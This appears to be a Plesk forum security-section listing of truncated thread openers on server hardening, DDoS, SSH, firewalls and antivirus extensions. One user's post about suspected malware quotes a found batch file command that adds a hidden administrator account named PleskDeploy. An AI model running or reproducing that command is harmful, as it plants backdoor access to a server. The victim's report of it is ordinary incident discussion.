security

This (What DDoS protection tools are available in Plesk) recently updated article shows that we still need paid extensions to better protect our servers against ddos attacks. It would be great if Plesk would create a more advanced anti-ddos monitoring tool with a useful interface, alerts, and...

I recently needed to connect to my Plesk server, via SSH, using my Root credentials. My choice of software being PuTTy. To achieve this, I had to perform the following commands, due to having previously disabled Root access via SSH: login as: [Another user on the Plesk server] password...

I have recently come to realise that it is considered good practice, from a security point of view, to change the default Port for SSH client connection from 22. I have spoken with my VPS provider, who has confirmed that all 65,535 Ports are available for use. Would I then be right in thinking...

Hello, I realized today that I can easily setup an email account in my email client with ANY email address and use my Plesk SMTP account credentials for it. That means: A person from one company (domain) on my server can send emails in the name of another person from the same or even another...

in my windows server with plesk obsidian and mssql 2019 I feel like I've been attacked by malware. There are two files in the C:\ProgramData\Application\Windows. File named runtime.bat with the following content: net user PleskDeploy 123_Hoho /add & net localgroup administrators PleskDeploy...

Hello We are excited to announce the release of our new plugin Deny-Country for plesk: Deny-country - Plesk Extensions With this extension you will be able to: - Limit / deny general access of your website per country (Very useful to avoid intensive access from a specific country that can...

Following my security path before to submit the system to a penetration test I find that I should disable this feature in Apache TraceEnable off though I haven't found any article related to Plesk, where should I put this config? in the httpd.conf? or is something that Plesk has already...

Hello everyone, we are going to submit out system to a penetration testing and we are trying to fix some minor problems before to do it but I have some problems with this configuration for Apache ServerTokens ProductOnly ServerSignature Off Header set X-XSS-Protection "1; mode=block" Header...

I run a virtual server and register more and more attacks from Asia. Especially from China and via a provider called DigitalOcean. What is the easiest way to block an entire country in Plesk? With htaccess I can only block access to a single website. And the file has to be read every time a...

I am contemplating the installation of the Plesk Firewall extension, where I can see that Policies and Rules can be set as to restrict access to a server based on IP. Firstly, what is the difference between restricting access by IP within 'Plesk's Firewall Extension' and within 'Tools &...

Dear fellow Pleskians, Following quite a few hours of reading posts on this forum, and the Plesk docs (Protection Against Brute Force Attacks (Fail2Ban)), and a few interesting technical chats with more experienced people, I've significantly reduced the no of IPs hammering my server. Now I...

Hi! :) Plesk has many security extensions, many! Could you tell me which is the best investment to sleep well at night? What is the best combination of extensions to be completely covered? Thank you! :D

Hi! :) I've been working with servers and plesk for two years, but learning from tutorials. Now I'm going to set up my own dedicated server, but I'm pretty scared about security. There are tutorials that say I need to install ClamAV and RKhunter on my server, regardless of the security of...

Hi; As a newbie to VPS and Plesk, I tried to secure my server following the tutorials. But when I started by changing the port in sshd_config, I got connection refused. I reinstalled my VPS, started from zero and each time I get some kind of error. All I want is to sleep comfortably knowing that...

Via Plesk, we provide (and so have users that prefer to use) Roundcube Webmail. There's already a lot of very helpful Plesk pages, which we've used previoulsy, to make this even more secure than the default settings it is provided with. The quickest way to make all these modifications in our...

I have a bunch of sites setup in Plesk. Most of them are running MSSQL hosted by the same server. Each database is supplied with it's own MSSQL login credentials. This allows me to connect to each database remotely. I disabled the sa account because it's extremely bad practice to expose this...

A couple of days ago, Nginx identified some issues which they have fixed by releasing a stable version of 1.14.1 Subsequently, Ubuntu have identified these security issues affect their own OS Nginx packages on these releases: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS The...

Hi to everyone, I want to let you know that i seeing a situation about the Webmail subdomain. When i activating a new SSL certificate to my webmail. Then the https will not be activated automaticly by Plesk Onyx. Regards, Edward

Hi everyone! We're excited to get back with a significant update of Revisium Antivirus 2.0-17. What's new? * Now it's available in three versions: Free, Premium and Shared Hosting editions. * Free edition is still a full-featured malware file scanner and domain reputation checker; no trials...

Hello, I just wanted to follow this cool Advisor feature, and fix all suggestions one by one. Untill now I thought that all my WordPress instances are secured, because status on all instances was "secured". But after security scanning, I got "Danger" status, reported only file permissions...